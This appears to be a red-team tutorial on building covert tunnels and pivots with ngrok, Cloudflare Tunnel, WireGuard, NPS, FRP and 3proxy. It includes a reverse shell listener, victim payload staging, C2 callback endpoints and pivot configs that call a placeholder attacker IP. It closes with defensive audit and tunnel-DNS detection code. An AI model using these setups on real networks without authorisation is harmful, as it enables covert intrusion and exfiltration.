
Cloud-Based Tunneling and Proxy Infrastructure

#Overview

Cloud tunneling services provide persistent, encrypted tunnels through CDN and cloud infrastructure. These are increasingly relevant for red team operations where cloud egress is permitted and you need stable, NAT-traversing tunnels that survive network changes.

#ngrok

ngrok creates stable tunnels through ngrok's cloud infrastructure. Useful as a callback endpoint behind NAT.

```bash
# Install
curl -s https://ngrok-client.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc > /dev/null
echo "deb https://ngrok-client.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list
sudo apt update && sudo apt install ngrok

# Authenticate
ngrok config add-authtoken <token>

# HTTP tunnel (exposes local port as HTTPS URL)
ngrok http 8080

# TCP tunnel (exposes local port as TCP endpoint)
ngrok tcp 22

# TLS tunnel (encrypted TCP)
ngrok tls 443

# With custom domain (paid)
ngrok http --domain=tunnel.example.com 8080
```

#Red Team Use Cases

```bash
# 1. Stable reverse shell listener behind NAT
ngrok tcp 4444
# Client connects to: tcp://0.tcp.ngrok.io:XXXXX

# 2. Payload staging server
ngrok http 8080
# Victim downloads from: https://xxxx.ngrok-free.app/payload.exe

# 3. C2 callback endpoint
ngrok tls 443
# Implant beacons to: tls://xxxx.ngrok-free.app:443
```

#Cloudflare Tunnel (cloudflared)

Cloudflare Tunnel (formerly Argo Tunnel) creates an encrypted tunnel from your server to Cloudflare's edge. No open firewall ports needed.

```bash
# Install
wget -q https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb
sudo dpkg -i cloudflared-linux-amd64.deb

# Authenticate
cloudflared tunnel login

# Create tunnel
cloudflared tunnel create redteam-tunnel

# Configure tunnel (the last ingress rule must be a catch-all)
cat > ~/.cloudflared/config.yml << EOF
tunnel: <tunnel-id>
credentials-file: /root/.cloudflared/<tunnel-id>.json

ingress:
  - hostname: c2.yourdomain.com
    service: http://127.0.0.1:8080
  - hostname: staging.yourdomain.com
    service: http://127.0.0.1:9090
  - service: http_status:404
EOF

# Create DNS record (repeat for every hostname in the ingress rules,
# e.g. staging.yourdomain.com, or that hostname will not resolve)
cloudflared tunnel route dns redteam-tunnel c2.yourdomain.com

# Run tunnel
cloudflared tunnel run redteam-tunnel
```

#Cloudflare Tunnel Advantages

  • No open inbound ports on the team server
  • TLS termination at Cloudflare edge
  • Legitimate Cloudflare IP addresses in traffic
  • Custom domain with valid TLS certificate

#WireGuard-Based Pivoting

WireGuard is a lightweight VPN protocol that can be used for fast, encrypted pivoting between hosts.

```bash
# Install
apt install wireguard

# Generate keys
wg genkey | tee server_private.key | wg pubkey > server_public.key
wg genkey | tee client_private.key | wg pubkey > client_public.key

# Server (attacker) configuration
cat > /etc/wireguard/wg0.conf << EOF
[Interface]
Address = 10.200.0.1/24
ListenPort = 51820
PrivateKey = $(cat server_private.key)

[Peer]
PublicKey = $(cat client_public.key)
AllowedIPs = 10.200.0.2/32
EOF

# Client (pivot) configuration
cat > /etc/wireguard/wg0.conf << EOF
[Interface]
Address = 10.200.0.2/24
PrivateKey = $(cat client_private.key)

[Peer]
PublicKey = $(cat server_public.key)
Endpoint = <attacker_ip>:51820
AllowedIPs = 10.200.0.0/24, 172.16.0.0/24
PersistentKeepalive = 25
EOF

# Start WireGuard
wg-quick up wg0

# Verify
ping 10.200.0.1   # From client
ping 10.200.0.2   # From server

# Enable IP forwarding on server
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 10.200.0.0/24 -o eth0 -j MASQUERADE

# Route internal traffic through WireGuard on client
ip route add 172.16.0.0/24 via 10.200.0.1 dev wg0
```

#WireGuard vs SSH Tunneling

| Feature | WireGuard | SSH -D/-L/-R |
|---|---|---|
| Speed | Kernel-level (fast) | User-space (slower) |
| Setup | Config file + wg-quick | Single command |
| Protocol | UDP only | TCP only |
| Transparency | Full VPN (all traffic) | SOCKS or port forward |
| Persistence | systemd service | autossh |

#NPS (Lightweight Proxy Server)

NPS is a lightweight, self-hosted reverse proxy server with web management.

```bash
# Install server (attacker)
wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_server.tar.gz
tar -xzf linux_amd64_server.tar.gz
sudo ./nps install
sudo nps start

# Web management at http://<attacker>:8080 (admin/123)
# Add clients, configure tunnels through the web UI

# Install client (pivot)
wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_client.tar.gz
tar -xzf linux_amd64_client.tar.gz
./npc -server=<attacker>:8024 -vkey=<client_key>
```

#FRP (Fast Reverse Proxy)

```bash
# Server (attacker) configuration
cat > frps.ini << EOF
[common]
bind_port = 7000
EOF

# Start server
./frps -c frps.ini

# Client (pivot) configuration
cat > frpc.ini << EOF
[common]
server_addr = <attacker_ip>
server_port = 7000

[socks]
type = tcp
remote_port = 1080
plugin = socks5
EOF

# Start client
./frpc -c frpc.ini

# Use SOCKS proxy on attacker:1080
proxychains4 nmap -sn 172.16.0.0/24
```

#3proxy (SOCKS/HTTP Proxy Chain)

```bash
# Install
apt install 3proxy

# Configuration
cat > /etc/3proxy/3proxy.cfg << EOF
dnspr
nserver 8.8.8.8
nscache 65536
timeouts 1 5 30 60 180 1800 15 60

users admin:CL:password123
auth strong

# SOCKS5 proxy
flush
auth strong
allow admin
socks -p1080

# HTTP proxy
flush
auth strong
allow admin
proxy -p3128
EOF

# Start
sudo systemctl start 3proxy

# Connect with authentication
curl -x socks5://admin:password123@127.0.0.1:1080 http://172.16.0.10/
```

#Common Pitfalls

  1. ngrok rate limits: Free ngrok has connection and bandwidth limits. Use paid plan for sustained operations.
  2. Cloudflare tunnel DNS propagation: New DNS records take minutes to propagate. Plan ahead.
  3. WireGuard UDP blocking: If UDP is blocked outbound, WireGuard won't work. Fall back to SSH or Chisel.
  4. NPS/FRP security: Default credentials are weak. Always change admin passwords and use TLS.
  5. 3proxy authentication: Without auth, anyone can use your proxy. Always configure auth strong.
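To make pitfall 5 checkable before a listener goes live, the following added example (not part of the module) audits a 3proxy.cfg: it flags every service directive started while the `auth` mode in effect does not verify credentials, and every `users` entry stored as a cleartext (CL) password. Treating only `strong` and `cache` as credential-verifying modes is an assumption; the sample config is the module's own with one unauthenticated listener appended.

```python
# Constructed sample: the module's 3proxy.cfg plus a forgotten
# 'auth none' HTTP listener on 8080 that the audit should catch.
SAMPLE_CFG = """\
nserver 8.8.8.8
users admin:CL:password123
auth strong
flush
auth strong
allow admin
socks -p1080
flush
auth strong
allow admin
proxy -p3128
flush
auth none
proxy -p8080
"""

# Directives that open a listening service in 3proxy.
SERVICES = {"socks", "proxy", "tcppm", "udppm", "pop3p", "ftppr"}
# Auth modes that actually check user credentials (assumption: only these).
STRONG_AUTH = {"strong", "cache"}


def audit_3proxy(cfg: str) -> list[str]:
    """Return one finding per weakness, in file order.

    Assumes 3proxy semantics: an 'auth' line stays in effect until the
    next 'auth' line; 'flush' clears ACLs but does not reset auth.
    """
    findings: list[str] = []
    auth_mode = None  # no 'auth' seen yet: nothing is authenticated
    for lineno, raw in enumerate(cfg.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        directive, *args = line.split()
        if directive == "auth":
            auth_mode = args[0] if args else None
        elif directive == "users":
            for spec in args:
                if ":CL:" in spec:  # CL = cleartext, CR = crypt hash
                    findings.append(f"line {lineno}: user {spec.split(':')[0]} "
                                    "stored with cleartext (CL) password; prefer CR hashes")
        elif directive in SERVICES and auth_mode not in STRONG_AUTH:
            findings.append(f"line {lineno}: '{line}' starts with auth={auth_mode or 'unset'}; "
                            "anyone who can reach the port can use it")
    return findings
```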

#OPSEC Considerations

  • ngrok and Cloudflare tunnels use well-known cloud IP ranges — some organizations block these
  • WireGuard UDP traffic is detectable by protocol analysis
  • NPS/FRP web management interfaces are often exposed to the internet — secure them
  • Cloud-based tunnels leave DNS records and TLS certificates that persist after the engagement
  • Always use custom domains with valid TLS certificates for C2 infrastructure
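The first OPSEC point is what a blue team turns into a detection: the following added example (not part of the module) scans constructed DNS resolver log lines and reports each client that resolved a tunnel-service hostname. The suffix list is an assumption (ngrok.io and ngrok-free.app appear above; ngrok.app and trycloudflare.com are the other public hostname families these two services hand out) and should be tuned per environment.

```python
from collections import Counter

# Assumed watchlist of public tunnel-service hostname suffixes; extend as needed.
TUNNEL_SUFFIXES = ("ngrok.io", "ngrok-free.app", "ngrok.app", "trycloudflare.com")

# Constructed sample resolver log: "<timestamp> <client_ip> <qname> <qtype>"
SAMPLE_LOG = """\
2024-05-01T09:00:01Z 10.1.4.22 updates.example.org A
2024-05-01T09:00:03Z 10.1.4.22 0.tcp.ngrok.io A
2024-05-01T09:00:04Z 10.1.4.37 intranet.example.org A
2024-05-01T09:00:09Z 10.1.4.22 0.tcp.ngrok.io A
2024-05-01T09:01:12Z 10.1.7.9 a1b2-c3d4.trycloudflare.com A
2024-05-01T09:01:15Z 10.1.7.9 notngrok.io A
"""


def is_tunnel_host(qname: str) -> bool:
    """Match on whole DNS labels only: 'x.ngrok.io' hits, 'notngrok.io' does not."""
    host = qname.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in TUNNEL_SUFFIXES)


def find_tunnel_lookups(log: str) -> dict[str, Counter]:
    """Return {client_ip: Counter(tunnel hostname -> query count)}."""
    hits: dict[str, Counter] = {}
    for raw in log.splitlines():
        parts = raw.split()
        if len(parts) < 3:
            continue  # skip blank or malformed lines
        _ts, client, qname = parts[:3]
        if is_tunnel_host(qname):
            hits.setdefault(client, Counter())[qname.lower()] += 1
    return hits


if __name__ == "__main__":
    for client, names in find_tunnel_lookups(SAMPLE_LOG).items():
        for name, count in names.items():
            print(f"{client} resolved {name} {count}x")
```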

#Cross-References